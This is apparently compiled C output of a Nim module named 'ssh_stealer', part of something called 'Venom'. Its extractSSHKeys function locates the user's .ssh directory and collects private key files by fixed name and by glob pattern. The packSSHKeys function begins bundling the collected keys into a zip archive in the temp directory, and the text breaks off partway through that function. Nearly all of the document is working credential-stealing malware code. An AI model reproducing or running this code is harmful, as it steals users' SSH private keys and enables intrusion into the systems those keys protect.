static N_INLINE(NIM_BOOL*, nimErrorFlag)(void) {
	NIM_BOOL* result;
	result = (&nimInErrorMode__system_u4509);
	return result;
}
static N_INLINE(void, nimZeroMem)(void* p_p0, NI size_p1) {
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	nimSetMem__systemZmemory_u7(p_p0, ((int)0), size_p1);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
static N_INLINE(void, nimFrame)(TFrame* s_p0) {
	{
		if (!(framePtr__system_u2741 == ((TFrame*) NIM_NIL))) goto LA3_;
		(*s_p0).calldepth = ((NI16)0);
	}
	goto LA1_;
LA3_: ;
	{
		(*s_p0).calldepth = (NI16)((*framePtr__system_u2741).calldepth + ((NI16)1));
	}
LA1_: ;
	(*s_p0).prev = framePtr__system_u2741;
	framePtr__system_u2741 = s_p0;
	{
		if (!((*s_p0).calldepth == ((NI16)2000))) goto LA8_;
		callDepthLimitReached__system_u4727();
	}
LA8_: ;
}
static N_INLINE(void, popFrame)(void) {
	framePtr__system_u2741 = (*framePtr__system_u2741).prev;
}
static N_INLINE(NimStringV2, slash___stdZprivateZospaths2_u88)(NimStringV2 head_p0, NimStringV2 tail_p1) {
	NimStringV2 result;
NIM_BOOL* nimErr_;
	nimfr_("/", "/usr/lib/nim/lib/std/private/ospaths2.nim");
{nimErr_ = nimErrorFlag();
	result.len = 0; result.p = NIM_NIL;
	nimlf_(178, "/usr/lib/nim/lib/std/private/ospaths2.nim");	result = nosjoinPath(head_p0, tail_p1);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
	popFrame();
	return result;
}
static N_INLINE(void, nimCopyMem)(void* dest_p0, void* source_p1, NI size_p2) {
	void* T1_;
	T1_ = (void*)0;
	T1_ = memcpy(dest_p0, source_p1, ((size_t) (size_p2)));
}
static N_INLINE(NCSTRING, nimToCStringConv)(NimStringV2 s_p0) {
	NCSTRING result;
	{
		if (!(s_p0.len == ((NI)0))) goto LA3_;
		result = "";
	}
	goto LA1_;
LA3_: ;
	{
		result = ((NCSTRING) ((*s_p0.p).data));
	}
LA1_: ;
	return result;
}
static N_INLINE(NIM_BOOL, eqeq___system_u8924)(NCSTRING x_p0, NCSTRING y_p1) {
	NIM_BOOL result;
	nimfr_("==", "/usr/lib/nim/lib/system.nim");
	nimlf_(2729, "/usr/lib/nim/lib/system.nim");	{
		if (!(((void*) (x_p0)) == ((void*) (y_p1)))) goto LA3_;
		result = NIM_TRUE;
	}
	goto LA1_;
LA3_: ;
	{
		NIM_BOOL T6_;
		nimln_(2730);		T6_ = (NIM_BOOL)0;
		T6_ = (((void*) (x_p0)) == NIM_NIL);
		if (T6_) goto LA7_;
		T6_ = (((void*) (y_p1)) == NIM_NIL);
LA7_: ;
		if (!T6_) goto LA8_;
		result = NIM_FALSE;
	}
	goto LA1_;
LA8_: ;
	{
		int T11_;
		nimln_(2731);		T11_ = (int)0;
		T11_ = strcmp(x_p0, y_p1);
		result = (T11_ == ((NI32)0));
	}
LA1_: ;
	popFrame();
	return result;
}
static N_INLINE(int, nimCmpMem)(void* a_p0, void* b_p1, NI size_p2) {
	int result;
	result = memcmp(a_p0, b_p1, ((size_t) (size_p2)));
	return result;
}
static N_INLINE(NIM_BOOL, equalMem__system_u1739)(void* a_p0, void* b_p1, NI size_p2) {
	NIM_BOOL result;
	int T1_;
	T1_ = (int)0;
	T1_ = nimCmpMem(a_p0, b_p1, size_p2);
	result = (T1_ == ((NI32)0));
	return result;
}
static N_INLINE(NIM_BOOL, eqStrings)(NimStringV2 a_p0, NimStringV2 b_p1) {
	NIM_BOOL result;
	NI alen_1;
	NI blen_1;
	nimfr_("eqStrings", "/usr/lib/nim/lib/system/strmantle.nim");
{	nimlf_(35, "/usr/lib/nim/lib/system/strmantle.nim");	result = NIM_FALSE;
	nimln_(36);	alen_1 = a_p0.len;
	nimln_(37);	blen_1 = b_p1.len;
	nimln_(38);	{
		if (!(alen_1 == blen_1)) goto LA3_;
		nimln_(39);		{
			if (!(alen_1 == ((NI)0))) goto LA7_;
			nimln_(34);			nimln_(39);			result = NIM_TRUE;
			goto BeforeRet_;
		}
LA7_: ;
		nimln_(40);		nimln_(34);		nimln_(40);		result = equalMem__system_u1739(((void*) ((&a_p0.p->data[((NI)0)]))), ((void*) ((&b_p1.p->data[((NI)0)]))), (alen_1));
		goto BeforeRet_;
	}
LA3_: ;
	}BeforeRet_: ;
	popFrame();
	return result;
}
static N_INLINE(NI, find__stdZenumutils_u55)(NimStringV2* a_p0, NI a_p0Len_0, NimStringV2 item_p1) {
	NI result;
	nimfr_("find", "/usr/lib/nim/lib/system.nim");
{	nimlf_(1759, "/usr/lib/nim/lib/system.nim");	result = ((NI)0);
	{
		NimStringV2* i_1;
		NI i_2;
		i_1 = (NimStringV2*)0;
		nimlf_(18, "/usr/lib/nim/lib/system/iterators.nim");		i_2 = ((NI)0);
		{
			nimln_(19);			while (1) {
				NI TM__2xpQS59aSyPswVY8RfkDWhg_26;
				if (!(i_2 < a_p0Len_0)) goto LA3;
				nimlf_(1760, "/usr/lib/nim/lib/system.nim");				if (i_2 < 0 || i_2 >= a_p0Len_0){ raiseIndexError2(i_2,a_p0Len_0-1); goto BeforeRet_;
				}
				i_1 = (&a_p0[i_2]);
				nimln_(1761);				{
					if (!eqStrings((*i_1), item_p1)) goto LA6_;
					goto BeforeRet_;
				}
LA6_: ;
				nimln_(1762);				if (nimAddInt(result, ((NI)1), &TM__2xpQS59aSyPswVY8RfkDWhg_26)) { raiseOverflow(); goto BeforeRet_;
				};
				result = (NI)(TM__2xpQS59aSyPswVY8RfkDWhg_26);
				nimlf_(13, "/usr/lib/nim/lib/system/iterators.nim");				i_2 += ((NI)1);
			} LA3: ;
		}
	}
	nimlf_(1763, "/usr/lib/nim/lib/system.nim");	result = ((NI)-1);
	}BeforeRet_: ;
	popFrame();
	return result;
}
static N_INLINE(NIM_BOOL, contains__stdZenumutils_u50)(NimStringV2* a_p0, NI a_p0Len_0, NimStringV2 item_p1) {
	NIM_BOOL result;
	NI T1_;
	nimfr_("contains", "/usr/lib/nim/lib/system.nim");
{	nimln_(1777);	nimln_(1765);	nimln_(1777);	T1_ = (NI)0;
	T1_ = find__stdZenumutils_u55(a_p0, a_p0Len_0, item_p1);
	result = (((NI)0) <= T1_);
	goto BeforeRet_;
	}BeforeRet_: ;
	popFrame();
	return result;
}
N_LIB_PRIVATE N_NIMCALL(tySequence__sM4lkSb7zS6F7OVMvW9cffQ, extractSSHKeys__ssh95stealer_u4)(void) {
	tySequence__sM4lkSb7zS6F7OVMvW9cffQ result;
	NimStringV2 userProfile_1;
	NimStringV2 sshDir_1;
	tyArray__17w6ns39bmjfAZ429aQpCFUA targetFiles_1;
NIM_BOOL* nimErr_;
	nimfr_("extractSSHKeys", "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");
{nimErr_ = nimErrorFlag();
	result.len = 0; result.p = NIM_NIL;
	userProfile_1.len = 0; userProfile_1.p = NIM_NIL;
	sshDir_1.len = 0; sshDir_1.p = NIM_NIL;
	nimZeroMem((void*)targetFiles_1, sizeof(tyArray__17w6ns39bmjfAZ429aQpCFUA));
	nimlf_(5, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	result.len = 0; result.p = (tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content*) newSeqPayload(0, sizeof(NimStringV2), NIM_ALIGNOF(NimStringV2));
	nimln_(7);	userProfile_1 = getEnv__stdZenvvars_u15(TM__2xpQS59aSyPswVY8RfkDWhg_7, TM__2xpQS59aSyPswVY8RfkDWhg_9);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(8);	sshDir_1 = slash___stdZprivateZospaths2_u88(userProfile_1, TM__2xpQS59aSyPswVY8RfkDWhg_11);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(10);	{
		NIM_BOOL T4_;
		T4_ = (NIM_BOOL)0;
		T4_ = nosdirExists(sshDir_1);
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		if (!!(T4_)) goto LA5_;
		nimln_(11);		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (sshDir_1.p && !(sshDir_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(sshDir_1.p);
}
		if (userProfile_1.p && !(userProfile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(userProfile_1.p);
}
		goto BeforeRet_;
	}
LA5_: ;
	nimlf_(14, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	nimCopyMem((void*)targetFiles_1, (NIM_CONST void*)TM__2xpQS59aSyPswVY8RfkDWhg_12, sizeof(tyArray__17w6ns39bmjfAZ429aQpCFUA));
	{
		NimStringV2 file_1;
		NI i_1;
		file_1.len = 0; file_1.p = NIM_NIL;
		nimlf_(43, "/usr/lib/nim/lib/system/iterators.nim");		i_1 = ((NI)0);
		{
			nimln_(44);			while (1) {
				NimStringV2 fullPath_1;
				fullPath_1.len = 0; fullPath_1.p = NIM_NIL;
				nimlf_(1694, "/usr/lib/nim/lib/system.nim");				eqcopy___system_u2708((&file_1), targetFiles_1[(i_1)- 0]);
				nimlf_(27, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");				fullPath_1 = slash___stdZprivateZospaths2_u88(sshDir_1, file_1);
				if (NIM_UNLIKELY(*nimErr_)) goto LA11_;
				nimln_(28);				{
					NIM_BOOL T14_;
					NimStringV2 blitTmp_1;
					T14_ = (NIM_BOOL)0;
					T14_ = nosfileExists(fullPath_1);
					if (NIM_UNLIKELY(*nimErr_)) goto LA11_;
					if (!T14_) goto LA15_;
					nimln_(29);					blitTmp_1 = fullPath_1;
					nimlf_(1694, "/usr/lib/nim/lib/system.nim");					eqwasMoved___system_u2705((&fullPath_1));
					nimlf_(29, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");					add__stdZenumutils_u70((&result), blitTmp_1);
				}
LA15_: ;
				nimlf_(46, "/usr/lib/nim/lib/system/iterators.nim");				{
					if (!(((NI)8) <= i_1)) goto LA19_;
					nimlf_(394, "/usr/lib/nim/lib/system.nim");					if (fullPath_1.p && !(fullPath_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(fullPath_1.p);
}
					nimlf_(46, "/usr/lib/nim/lib/system/iterators.nim");					goto LA9;
				}
LA19_: ;
				nimln_(13);				i_1 += ((NI)1);
				{
					LA11_:;
				}
				{
					nimlf_(394, "/usr/lib/nim/lib/system.nim");					if (fullPath_1.p && !(fullPath_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(fullPath_1.p);
}
				}
				if (NIM_UNLIKELY(*nimErr_)) goto LA8_;
			}
		} LA9: ;
		{
			LA8_:;
		}
		{
			if (file_1.p && !(file_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(file_1.p);
}
		}
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	}
	{
		NimStringV2 file_2;
		NimStringV2 colontmp_;
		glob_t fX60gensym5__1;
		NI resX60gensym5__1;
		int T26_;
		file_2.len = 0; file_2.p = NIM_NIL;
		colontmp_.len = 0; colontmp_.p = NIM_NIL;
		nimlf_(117, "/usr/lib/nim/lib/std/private/osdirs.nim");		nimlf_(32, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		colontmp_ = slash___stdZprivateZospaths2_u88(sshDir_1, TM__2xpQS59aSyPswVY8RfkDWhg_23);
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		nimZeroMem((void*)(&fX60gensym5__1), sizeof(glob_t));
		resX60gensym5__1 = (NI)0;
		nimlf_(85, "/usr/lib/nim/lib/std/private/osdirs.nim");		fX60gensym5__1.gl_offs = ((size_t)0);
		nimln_(86);		fX60gensym5__1.gl_pathc = ((size_t)0);
		nimln_(87);		fX60gensym5__1.gl_pathv = ((NCSTRING*) NIM_NIL);
		nimln_(88);		T26_ = (int)0;
		T26_ = glob(nimToCStringConv(colontmp_), ((int)0), NIM_NIL, (&fX60gensym5__1));
		resX60gensym5__1 = ((NI) (T26_));
		nimln_(90);		{
			if (!(resX60gensym5__1 == ((NI)0))) goto LA30_;
			{
				NU64 iX60gensym5__1;
				NU64 colontmp__2;
				NU64 res_1;
				iX60gensym5__1 = (NU64)0;
				colontmp__2 = (NU64)0;
				nimlf_(110, "/usr/lib/nim/lib/system/iterators_1.nim");				nimlf_(91, "/usr/lib/nim/lib/std/private/osdirs.nim");				colontmp__2 = ((NU64) ((NU)((NU64)(fX60gensym5__1.gl_pathc) - (NU64)(((NU)1)))));
				nimlf_(116, "/usr/lib/nim/lib/system/iterators_1.nim");				res_1 = 0ULL;
				{
					nimln_(117);					while (1) {
						NimStringV2 pathX60gensym5__1;
						if (!((NU64)(res_1) <= (NU64)(colontmp__2))) goto LA34;
						pathX60gensym5__1.len = 0; pathX60gensym5__1.p = NIM_NIL;
						nimlf_(91, "/usr/lib/nim/lib/std/private/osdirs.nim");						iX60gensym5__1 = res_1;
						nimln_(92);						{
							NIM_BOOL T37_;
							T37_ = (NIM_BOOL)0;
							T37_ = eqeq___system_u8924(fX60gensym5__1.gl_pathv[iX60gensym5__1], ((NCSTRING) NIM_NIL));
							if (!!(!(T37_))) goto LA38_;
							failedAssertImpl__stdZassertions_u234(TM__2xpQS59aSyPswVY8RfkDWhg_25);
							if (NIM_UNLIKELY(*nimErr_)) goto LA27_;
						}
LA38_: ;
						nimln_(93);						pathX60gensym5__1 = cstrToNimstr(fX60gensym5__1.gl_pathv[iX60gensym5__1]);
						nimln_(94);						{
							NIM_BOOL T42_;
							nimln_(133);							T42_ = (NIM_BOOL)0;
							T42_ = nosfileExists(pathX60gensym5__1);
							if (NIM_UNLIKELY(*nimErr_)) goto LA27_;
							if (!T42_) goto LA43_;
							nimlf_(1694, "/usr/lib/nim/lib/system.nim");							eqsink___system_u2714((&file_2), pathX60gensym5__1);
							eqwasMoved___system_u2705((&pathX60gensym5__1));
							nimlf_(33, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");							{
								NIM_BOOL T47_;
								NimStringV2 blitTmp_2;
								T47_ = (NIM_BOOL)0;
								T47_ = contains__stdZenumutils_u50(((result).p) ? (result.p->data) : NIM_NIL, result.len, file_2);
								if (!!(T47_)) goto LA48_;
								nimln_(34);								blitTmp_2 = file_2;
								nimlf_(1694, "/usr/lib/nim/lib/system.nim");								eqwasMoved___system_u2705((&file_2));
								nimlf_(34, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");								add__stdZenumutils_u70((&result), blitTmp_2);
							}
LA48_: ;
						}
LA43_: ;
						nimlf_(119, "/usr/lib/nim/lib/system/iterators_1.nim");						res_1 += ((NI)1);
						nimlf_(394, "/usr/lib/nim/lib/system.nim");						if (pathX60gensym5__1.p && !(pathX60gensym5__1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(pathX60gensym5__1.p);
}
					} LA34: ;
				}
			}
		}
LA30_: ;
		{
			LA27_:;
		}
		{
			nimlf_(89, "/usr/lib/nim/lib/std/private/osdirs.nim");			globfree((&fX60gensym5__1));
		}
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (colontmp_.p && !(colontmp_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmp_.p);
}
		if (file_2.p && !(file_2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(file_2.p);
}
	}
	{
		NimStringV2 file_3;
		NimStringV2 colontmp__3;
		glob_t fX60gensym5__2;
		NI resX60gensym5__2;
		int T53_;
		file_3.len = 0; file_3.p = NIM_NIL;
		colontmp__3.len = 0; colontmp__3.p = NIM_NIL;
		nimlf_(117, "/usr/lib/nim/lib/std/private/osdirs.nim");		nimlf_(36, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		colontmp__3 = slash___stdZprivateZospaths2_u88(sshDir_1, TM__2xpQS59aSyPswVY8RfkDWhg_28);
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		nimZeroMem((void*)(&fX60gensym5__2), sizeof(glob_t));
		resX60gensym5__2 = (NI)0;
		nimlf_(85, "/usr/lib/nim/lib/std/private/osdirs.nim");		fX60gensym5__2.gl_offs = ((size_t)0);
		nimln_(86);		fX60gensym5__2.gl_pathc = ((size_t)0);
		nimln_(87);		fX60gensym5__2.gl_pathv = ((NCSTRING*) NIM_NIL);
		nimln_(88);		T53_ = (int)0;
		T53_ = glob(nimToCStringConv(colontmp__3), ((int)0), NIM_NIL, (&fX60gensym5__2));
		resX60gensym5__2 = ((NI) (T53_));
		nimln_(90);		{
			if (!(resX60gensym5__2 == ((NI)0))) goto LA57_;
			{
				NU64 iX60gensym5__2;
				NU64 colontmp__4;
				NU64 res_2;
				iX60gensym5__2 = (NU64)0;
				colontmp__4 = (NU64)0;
				nimlf_(110, "/usr/lib/nim/lib/system/iterators_1.nim");				nimlf_(91, "/usr/lib/nim/lib/std/private/osdirs.nim");				colontmp__4 = ((NU64) ((NU)((NU64)(fX60gensym5__2.gl_pathc) - (NU64)(((NU)1)))));
				nimlf_(116, "/usr/lib/nim/lib/system/iterators_1.nim");				res_2 = 0ULL;
				{
					nimln_(117);					while (1) {
						NimStringV2 pathX60gensym5__2;
						if (!((NU64)(res_2) <= (NU64)(colontmp__4))) goto LA61;
						pathX60gensym5__2.len = 0; pathX60gensym5__2.p = NIM_NIL;
						nimlf_(91, "/usr/lib/nim/lib/std/private/osdirs.nim");						iX60gensym5__2 = res_2;
						nimln_(92);						{
							NIM_BOOL T64_;
							T64_ = (NIM_BOOL)0;
							T64_ = eqeq___system_u8924(fX60gensym5__2.gl_pathv[iX60gensym5__2], ((NCSTRING) NIM_NIL));
							if (!!(!(T64_))) goto LA65_;
							failedAssertImpl__stdZassertions_u234(TM__2xpQS59aSyPswVY8RfkDWhg_29);
							if (NIM_UNLIKELY(*nimErr_)) goto LA54_;
						}
LA65_: ;
						nimln_(93);						pathX60gensym5__2 = cstrToNimstr(fX60gensym5__2.gl_pathv[iX60gensym5__2]);
						nimln_(94);						{
							NIM_BOOL T69_;
							nimln_(133);							T69_ = (NIM_BOOL)0;
							T69_ = nosfileExists(pathX60gensym5__2);
							if (NIM_UNLIKELY(*nimErr_)) goto LA54_;
							if (!T69_) goto LA70_;
							nimlf_(1694, "/usr/lib/nim/lib/system.nim");							eqsink___system_u2714((&file_3), pathX60gensym5__2);
							eqwasMoved___system_u2705((&pathX60gensym5__2));
							nimlf_(37, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");							{
								NIM_BOOL T74_;
								NimStringV2 blitTmp_3;
								T74_ = (NIM_BOOL)0;
								T74_ = contains__stdZenumutils_u50(((result).p) ? (result.p->data) : NIM_NIL, result.len, file_3);
								if (!!(T74_)) goto LA75_;
								nimln_(38);								blitTmp_3 = file_3;
								nimlf_(1694, "/usr/lib/nim/lib/system.nim");								eqwasMoved___system_u2705((&file_3));
								nimlf_(38, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");								add__stdZenumutils_u70((&result), blitTmp_3);
							}
LA75_: ;
						}
LA70_: ;
						nimlf_(119, "/usr/lib/nim/lib/system/iterators_1.nim");						res_2 += ((NI)1);
						nimlf_(394, "/usr/lib/nim/lib/system.nim");						if (pathX60gensym5__2.p && !(pathX60gensym5__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(pathX60gensym5__2.p);
}
					} LA61: ;
				}
			}
		}
LA57_: ;
		{
			LA54_:;
		}
		{
			nimlf_(89, "/usr/lib/nim/lib/std/private/osdirs.nim");			globfree((&fX60gensym5__2));
		}
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (colontmp__3.p && !(colontmp__3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmp__3.p);
}
		if (file_3.p && !(file_3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(file_3.p);
}
	}
	{
		NimStringV2 file_4;
		NimStringV2 colontmp__5;
		glob_t fX60gensym5__3;
		NI resX60gensym5__3;
		int T80_;
		file_4.len = 0; file_4.p = NIM_NIL;
		colontmp__5.len = 0; colontmp__5.p = NIM_NIL;
		nimlf_(117, "/usr/lib/nim/lib/std/private/osdirs.nim");		nimlf_(40, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		colontmp__5 = slash___stdZprivateZospaths2_u88(sshDir_1, TM__2xpQS59aSyPswVY8RfkDWhg_31);
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		nimZeroMem((void*)(&fX60gensym5__3), sizeof(glob_t));
		resX60gensym5__3 = (NI)0;
		nimlf_(85, "/usr/lib/nim/lib/std/private/osdirs.nim");		fX60gensym5__3.gl_offs = ((size_t)0);
		nimln_(86);		fX60gensym5__3.gl_pathc = ((size_t)0);
		nimln_(87);		fX60gensym5__3.gl_pathv = ((NCSTRING*) NIM_NIL);
		nimln_(88);		T80_ = (int)0;
		T80_ = glob(nimToCStringConv(colontmp__5), ((int)0), NIM_NIL, (&fX60gensym5__3));
		resX60gensym5__3 = ((NI) (T80_));
		nimln_(90);		{
			if (!(resX60gensym5__3 == ((NI)0))) goto LA84_;
			{
				NU64 iX60gensym5__3;
				NU64 colontmp__6;
				NU64 res_3;
				iX60gensym5__3 = (NU64)0;
				colontmp__6 = (NU64)0;
				nimlf_(110, "/usr/lib/nim/lib/system/iterators_1.nim");				nimlf_(91, "/usr/lib/nim/lib/std/private/osdirs.nim");				colontmp__6 = ((NU64) ((NU)((NU64)(fX60gensym5__3.gl_pathc) - (NU64)(((NU)1)))));
				nimlf_(116, "/usr/lib/nim/lib/system/iterators_1.nim");				res_3 = 0ULL;
				{
					nimln_(117);					while (1) {
						NimStringV2 pathX60gensym5__3;
						if (!((NU64)(res_3) <= (NU64)(colontmp__6))) goto LA88;
						pathX60gensym5__3.len = 0; pathX60gensym5__3.p = NIM_NIL;
						nimlf_(91, "/usr/lib/nim/lib/std/private/osdirs.nim");						iX60gensym5__3 = res_3;
						nimln_(92);						{
							NIM_BOOL T91_;
							T91_ = (NIM_BOOL)0;
							T91_ = eqeq___system_u8924(fX60gensym5__3.gl_pathv[iX60gensym5__3], ((NCSTRING) NIM_NIL));
							if (!!(!(T91_))) goto LA92_;
							failedAssertImpl__stdZassertions_u234(TM__2xpQS59aSyPswVY8RfkDWhg_32);
							if (NIM_UNLIKELY(*nimErr_)) goto LA81_;
						}
LA92_: ;
						nimln_(93);						pathX60gensym5__3 = cstrToNimstr(fX60gensym5__3.gl_pathv[iX60gensym5__3]);
						nimln_(94);						{
							NIM_BOOL T96_;
							nimln_(133);							T96_ = (NIM_BOOL)0;
							T96_ = nosfileExists(pathX60gensym5__3);
							if (NIM_UNLIKELY(*nimErr_)) goto LA81_;
							if (!T96_) goto LA97_;
							nimlf_(1694, "/usr/lib/nim/lib/system.nim");							eqsink___system_u2714((&file_4), pathX60gensym5__3);
							eqwasMoved___system_u2705((&pathX60gensym5__3));
							nimlf_(41, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");							{
								NIM_BOOL T101_;
								NimStringV2 blitTmp_4;
								T101_ = (NIM_BOOL)0;
								T101_ = contains__stdZenumutils_u50(((result).p) ? (result.p->data) : NIM_NIL, result.len, file_4);
								if (!!(T101_)) goto LA102_;
								nimln_(42);								blitTmp_4 = file_4;
								nimlf_(1694, "/usr/lib/nim/lib/system.nim");								eqwasMoved___system_u2705((&file_4));
								nimlf_(42, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");								add__stdZenumutils_u70((&result), blitTmp_4);
							}
LA102_: ;
						}
LA97_: ;
						nimlf_(119, "/usr/lib/nim/lib/system/iterators_1.nim");						res_3 += ((NI)1);
						nimlf_(394, "/usr/lib/nim/lib/system.nim");						if (pathX60gensym5__3.p && !(pathX60gensym5__3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(pathX60gensym5__3.p);
}
					} LA88: ;
				}
			}
		}
LA84_: ;
		{
			LA81_:;
		}
		{
			nimlf_(89, "/usr/lib/nim/lib/std/private/osdirs.nim");			globfree((&fX60gensym5__3));
		}
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (colontmp__5.p && !(colontmp__5.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmp__5.p);
}
		if (file_4.p && !(file_4.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(file_4.p);
}
	}
	{
		LA1_:;
	}
	{
		if (sshDir_1.p && !(sshDir_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(sshDir_1.p);
}
		if (userProfile_1.p && !(userProfile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(userProfile_1.p);
}
	}
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
	popFrame();
	return result;
}
static N_INLINE(void, copyMem__system_u1731)(void* dest_p0, void* source_p1, NI size_p2) {
	nimCopyMem(dest_p0, source_p1, size_p2);
}
static N_INLINE(void, appendString)(NimStringV2* dest_p0, NimStringV2 src_p1) {
{	{
		NI TM__2xpQS59aSyPswVY8RfkDWhg_53;
		if (!(((NI)0) < src_p1.len)) goto LA3_;
		if ((src_p1.len) < ((NI)0) || (src_p1.len) > ((NI)IL64(9223372036854775807))){ raiseRangeErrorI(src_p1.len, ((NI)0), ((NI)IL64(9223372036854775807))); goto BeforeRet_;
		}
		copyMem__system_u1731(((void*) ((&(*(*dest_p0).p).data[(*dest_p0).len]))), ((void*) ((&(*src_p1.p).data[((NI)0)]))), (src_p1.len));
		if (nimAddInt((*dest_p0).len, src_p1.len, &TM__2xpQS59aSyPswVY8RfkDWhg_53)) { raiseOverflow(); goto BeforeRet_;
		};
		(*dest_p0).len = (NI)(TM__2xpQS59aSyPswVY8RfkDWhg_53);
		(*(*dest_p0).p).data[(*dest_p0).len] = 0;
	}
LA3_: ;
	}BeforeRet_: ;
}
static N_INLINE(void, eqdestroy___system_u281)(NimStringV2 x_p0) {
	nimfr_("=destroy", "/usr/lib/nim/lib/system.nim");
	popFrame();
}
N_LIB_PRIVATE N_NIMCALL(NimStringV2, packSSHKeys__ssh95stealer_u71)(void) {
	NimStringV2 result;
	tySequence__sM4lkSb7zS6F7OVMvW9cffQ keys_1;
	NimStringV2 tempDir_1;
	NimStringV2 colontmpD_;
	NimStringV2 colontmpD__2;
	NimStringV2 zipFile_1;
	NimStringV2 colontmpD__3;
	NimStringV2 cmd_1;
	NimStringV2 result_2;
	NimStringV2 T7_;
	NI T8_;
	NimStringV2 T21_;
	NimStringV2 T22_;
	NI T23_;
NIM_BOOL* nimErr_;
	nimfr_("packSSHKeys", "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");
{nimErr_ = nimErrorFlag();
	result.len = 0; result.p = NIM_NIL;
	keys_1.len = 0; keys_1.p = NIM_NIL;
	tempDir_1.len = 0; tempDir_1.p = NIM_NIL;
	colontmpD_.len = 0; colontmpD_.p = NIM_NIL;
	colontmpD__2.len = 0; colontmpD__2.p = NIM_NIL;
	zipFile_1.len = 0; zipFile_1.p = NIM_NIL;
	colontmpD__3.len = 0; colontmpD__3.p = NIM_NIL;
	cmd_1.len = 0; cmd_1.p = NIM_NIL;
	result_2.len = 0; result_2.p = NIM_NIL;
	nimlf_(46, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	keys_1 = extractSSHKeys__ssh95stealer_u4();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(48);	{
		NI T4_;
		T4_ = keys_1.len;
		if (!(T4_ == ((NI)0))) goto LA5_;
		nimln_(49);		nimln_(44);		nimln_(49);		result = TM__2xpQS59aSyPswVY8RfkDWhg_52;
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (result_2.p && !(result_2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(result_2.p);
}
		if (cmd_1.p && !(cmd_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(cmd_1.p);
}
		if (colontmpD__3.p && !(colontmpD__3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__3.p);
}
		if (zipFile_1.p && !(zipFile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(zipFile_1.p);
}
		if (colontmpD__2.p && !(colontmpD__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__2.p);
}
		if (colontmpD_.p && !(colontmpD_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD_.p);
}
		if (tempDir_1.p && !(tempDir_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(tempDir_1.p);
}
		nimln_(2123);		eqdestroy___system_u3869(keys_1);
		goto BeforeRet_;
	}
LA5_: ;
	nimlf_(51, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	T7_.len = 0; T7_.p = NIM_NIL;
	colontmpD_ = nosgetTempDir();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T8_ = (NI)0;
	T8_ = getCurrentProcessId__pureZos_u445();
